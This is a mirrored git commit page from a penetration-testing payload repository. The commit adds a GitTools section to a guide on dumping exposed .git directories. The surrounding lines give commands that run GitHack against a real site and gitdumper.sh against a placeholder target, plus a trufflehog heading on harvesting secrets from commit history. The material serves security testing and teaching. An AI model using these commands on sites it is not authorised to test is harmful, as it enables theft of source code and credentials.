mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
Add tool GitTools
This commit is contained in:
parent
73fdd6e218
commit
4ab874d854
1 changed files with 8 additions and 0 deletions
|
@ -140,6 +140,14 @@ git clone https://github.com/lijiejie/GitHack
|
||||||
GitHack.py http://www.openssl.org/.git/
|
GitHack.py http://www.openssl.org/.git/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Automatic way: GitTools
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/internetwache/GitTools
|
||||||
|
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
|
||||||
|
git checkout -- .
|
||||||
|
```
|
||||||
|
|
||||||
### Harvesting secrets : trufflehog
|
### Harvesting secrets : trufflehog
|
||||||
|
|
||||||
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history
|
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history
|
||||||
|
|
Loading…
Reference in a new issue